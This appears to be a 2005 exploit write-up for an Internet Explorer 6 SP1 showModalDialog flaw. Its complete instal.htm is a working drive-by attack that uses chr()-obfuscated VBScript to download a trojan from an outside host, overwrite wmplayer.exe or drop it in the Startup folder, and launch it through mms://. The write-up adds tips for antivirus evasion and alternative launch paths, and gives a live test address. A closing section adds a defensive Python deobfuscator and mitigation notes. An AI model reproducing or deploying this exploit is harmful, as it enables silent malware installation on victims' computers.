Analysis of the IE6 SP1 showModalDialog remote file download and execution vulnerability
Author: czy   Source: http://czy82.mblogger.cn/   Updated: 2005-2-19
location="javascript:'<script>document.write(\"<script language=vbs>document.write chr(60)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(32)+chr(73)+chr(68)+chr(61)+chr(109)+chr(121)+chr(105)+chr(102)+chr(114)+chr(97)+chr(109)+chr(101)+chr(32)+chr(83)+chr(82)+chr(67)+chr(61)+chr(39)+chr(97)+chr(98)+chr(111)+chr(117)+chr(116)+chr(58)+chr(98)+chr(108)+chr(97)+chr(110)+chr(107)+chr(39)+chr(32)+chr(87)+chr(73)+chr(68)+chr(84)+chr(72)+chr(61)+chr(52)+chr(48)+chr(32)+chr(72)+chr(69)+chr(73)+chr(71)+chr(72)+chr(84)+chr(61)+chr(52)+chr(48)+chr(62)+chr(60)+chr(47)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(62):myiframe.document.write "+p+"<\\\\\/script>\");<\/script>'";

Note that the iframe written into myiframe uses the same name as the outer one; a different name would work just as well.

Step 3: what code should be written into the new myiframe?

set x = createObject("Microsoft.XMLHTTP")
x.Open "GET", "http://192.168.0.18/WINVER.exe",0
x.Send
set s = createObject("ADODB.Stream")
s.Mode = 3
s.Type = 1
s.Open
s.Write x.responseBody
p="C:\Program Files\Windows Media Player\wmplayer.exe"
s.SaveToFile p,2
p=replace (p,"wm","m")
p=replace (p,"er.","er2.")
s.SaveToFile p,2
s.SaveToFile "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\wmplayer.exe",2
location.href = "mms://"

Analysis: the XMLHTTP object first downloads our trojan, then ADODB.Stream writes it over wmplayer.exe in overwrite mode, and setting location.href to mms:// invokes our wmplayer.exe (Media Player 9.0) or mplayer2.exe (Media Player 6.0). Alternatively it is written to the Startup folder and runs at the next boot.

Because of the single/double quote conversion, I used the following generator:

-----------------------------chg.htm-----------------
<script language=vbs>
'str="<IFRAME ID=myiframe SRC='about:blank' WIDTH=40 HEIGHT=40></IFRAME>"
'str="http://127.0.0.1/W.e"
'str="C:\Program Files\Windows Media Player\wmplayer.exe"
str="http://www.chinansl.com/czy/w.e"
for i=1 to len(str)
document.write "chr("+cstr(asc(mid(str,i,1)))+")+"
next
</script>
--------------------------------end----------------------

The complete code is as follows:

-----------------------------------------instal.htm--------------------
<html>
<body>
<script language=vbs>
window.open "mdd.htm","_blank","top:0;left:0;height=100pix;width=100pix"
</script>
<script language="Javascript">
function InjectedDuringRedirection(){
var p="\\\\\"<script language=vbs>set x = createObject(chr(77)+chr(105)+chr(99)+chr(114)+chr(111)+chr(115)+chr(111)+chr(102)+chr(116)+chr(46)+chr(88)+chr(77)+chr(76)+chr(72)+chr(84)+chr(84)+chr(80)):x.Open chr(71)+chr(101)+chr(116),chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+chr(46)+chr(99)+chr(104)+chr(105)+chr(110)+chr(97)+chr(110)+chr(115)+chr(108)+chr(46)+chr(99)+chr(111)+chr(109)+chr(47)+chr(99)+chr(122)+chr(121)+chr(47)+chr(119)+chr(46)+chr(101),0:x.Send:set s=createobject(chr(97)+chr(100)+chr(111)+chr(100)+chr(98)+chr(46)+chr(115)+chr(116)+chr(114)+chr(101)+chr(97)+chr(109)):with s:.mode=3:.type=1:.open:.write x.responseBody:.savetofile chr(67)+chr(58)+chr(92)+chr(80)+chr(114)+chr(111)+chr(103)+chr(114)+chr(97)+chr(109)+chr(32)+chr(70)+chr(105)+chr(108)+chr(101)+chr(115)+chr(92)+chr(87)+chr(105)+chr(110)+chr(100)+chr(111)+chr(119)+chr(115)+chr(32)+chr(77)+chr(101)+chr(100)+chr(105)+chr(97)+chr(32)+chr(80)+chr(108)+chr(97)+chr(121)+chr(101)+chr(114)+chr(92)+chr(119)+chr(109)+chr(112)+chr(108)+chr(97)+chr(121)+chr(101)+chr(114)+chr(46)+chr(101)+chr(120)+chr(101),2:end with:location.href =chr(109)+chr(109)+chr(115)+chr(58)+chr(47)+chr(47)\\\\\""+"+chr(60)+chr(47)+chr(115)+chr(99)+chr(114)+chr(105)+chr(112)+chr(116)+chr(62)";
showModalDialog('md.htm',window,"resizable:no\;dialogHide:on\;status:no\;help:no\;dialogTop:500\;dialogLeft:200\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<script>document.write(\"<script language=vbs>document.write chr(60)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(32)+chr(73)+chr(68)+chr(61)+chr(109)+chr(121)+chr(105)+chr(102)+chr(114)+chr(97)+chr(109)+chr(101)+chr(32)+chr(83)+chr(82)+chr(67)+chr(61)+chr(39)+chr(97)+chr(98)+chr(111)+chr(117)+chr(116)+chr(58)+chr(98)+chr(108)+chr(97)+chr(110)+chr(107)+chr(39)+chr(32)+chr(87)+chr(73)+chr(68)+chr(84)+chr(72)+chr(61)+chr(52)+chr(48)+chr(32)+chr(72)+chr(69)+chr(73)+chr(71)+chr(72)+chr(84)+chr(61)+chr(52)+chr(48)+chr(62)+chr(60)+chr(47)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(62):myiframe.document.write "+p+"<\\\\\/script>\");<\/script>'";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100); // toString() yields the function's source code
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101); // call the function
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="http://www.chinansl.com/czy/re.asp" WIDTH=0 HEIGHT=0></IFRAME>');
</script>
</body>
<pre>
#--------------------#
#                    #
#  IE6sp1 new bug    #
#                    #
#  2004.06.10        #
#  by czy            #
#                    #
#--------------------#
</pre>
</html>
----------------------------------end-----------------------------

Step 4: some problems encountered:

1) How to find a help file that is certain to exist locally: C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm on XP; on 2000 it is C:\WINNT\Help\iexplore.chm::/iegetsrt.htm.
2) Where can the trojan be placed? If it does not need to run immediately, the Startup folder is also worth trying.
3) Does this hole work on 98? 98 has no adodb.stream object, so no.
4) Encryption? Yes, there are more and more antivirus products nowadays; the script can be encoded with WSE.
5) Can a program only be executed via mms? Running a program by way of location.href is a really clever method. The foreigners originally overwrote wmplayer.exe and then set location.href to mms:// to invoke it. One problem is that if other playback software is installed, or a different version of Media Player, it may fail, so I thought of overwriting msimn.exe under Program Files and setting location.href to news:; there are other workarounds as well.

Test address: www.chinansl.com/czy/instal.htm (only effective on 2k)
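Every sensitive string in the dropper above (the COM object names, the download URL, the target path, the mms:// handler) is hidden behind a chr() chain, which is exactly what made pages of this kind hard to triage by simple string matching. As an added example that is not part of czy's write-up, the following Python script reverses that obfuscation and lists which of the dropper's characteristic strings the decoded script contains. The sample input is constructed here in the same chr() idiom the page uses; the executable name and path in it are placeholders, and the indicator list is this example's own choice, not anything from the page.

```python
"""Deobfuscate VBScript chr()-chains and flag download-and-execute indicators.

Added example (not from the original write-up). The sample input below is
constructed here in the same chr() idiom the page uses; the file name and
path inside it are placeholders.
"""
import re
from typing import List, Tuple

# One VBScript chr(N) call, e.g. chr(60)
CHR_CALL = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
# A whole chain of chr() calls joined with '+' or '&' (VBScript accepts both)
CHR_CHAIN = re.compile(
    r"(?:chr\(\s*\d{1,3}\s*\)\s*[+&]\s*)*chr\(\s*\d{1,3}\s*\)", re.IGNORECASE
)

# Decoded substrings that, taken together, characterise the pattern on the page:
# fetch with XMLHTTP, write the bytes with ADODB.Stream over a known binary
# under Program Files, then fire a protocol handler that launches that binary.
INDICATORS: Tuple[str, ...] = (
    "microsoft.xmlhttp",
    "adodb.stream",
    "responsebody",
    "savetofile",
    "\\program files\\",
    "mms://",
)


def decode_chain(chain: str) -> str:
    """'chr(72)+chr(105)' -> 'Hi'."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(chain))


def deobfuscate(script: str) -> str:
    """Replace every chr() chain with a double-quoted VBScript literal of its value."""
    def repl(match: "re.Match[str]") -> str:
        value = decode_chain(match.group(0)).replace('"', '""')  # VBScript escapes " as ""
        return f'"{value}"'
    return CHR_CHAIN.sub(repl, script)


def find_indicators(decoded: str) -> List[str]:
    """Return the indicators present in an already decoded script, in INDICATORS order."""
    low = decoded.lower()
    return [ind for ind in INDICATORS if ind in low]


def analyze(script: str) -> Tuple[str, List[str]]:
    """Decode a script and list which indicators it contains."""
    decoded = deobfuscate(script)
    return decoded, find_indicators(decoded)


# Constructed sample in the page's idiom: encodes Microsoft.XMLHTTP, adodb.stream,
# the placeholder path C:\Program Files\x.exe, and mms://
SAMPLE_DROPPER = (
    "set x = createObject(chr(77)+chr(105)+chr(99)+chr(114)+chr(111)+chr(115)+chr(111)"
    "+chr(102)+chr(116)+chr(46)+chr(88)+chr(77)+chr(76)+chr(72)+chr(84)+chr(84)+chr(80))"
    ":x.Send:set s=createobject(chr(97)+chr(100)+chr(111)+chr(100)+chr(98)+chr(46)"
    "+chr(115)+chr(116)+chr(114)+chr(101)+chr(97)+chr(109)):with s:.write x.responseBody"
    ":.savetofile chr(67)+chr(58)+chr(92)+chr(80)+chr(114)+chr(111)+chr(103)+chr(114)"
    "+chr(97)+chr(109)+chr(32)+chr(70)+chr(105)+chr(108)+chr(101)+chr(115)+chr(92)"
    "+chr(120)+chr(46)+chr(101)+chr(120)+chr(101),2:end with"
    ":location.href=chr(109)+chr(109)+chr(115)+chr(58)+chr(47)+chr(47)"
)

# Constructed benign use of the same idiom: writes a "<b>" tag
SAMPLE_BENIGN = "document.write chr(60)+chr(98)+chr(62)"


if __name__ == "__main__":
    for name, script in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        decoded, hits = analyze(script)
        print(f"[{name}] decoded:    {decoded}")
        print(f"[{name}] indicators: {hits or 'none'}")
```

The page's payload is layered (a document.write of a script that itself carries chr() chains), so on a real capture the decoder is run again on its own output until nothing changes. Matching on the decoded strings is a triage aid, not the fix: the durable mitigation for this class of page was blocking the ADODB.Stream control in Internet Explorer (the kill bit Microsoft shipped in 2004) and, later, removing the broken showModalDialog behaviour itself.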
Entered by: IceRiver   Editor: IceRiver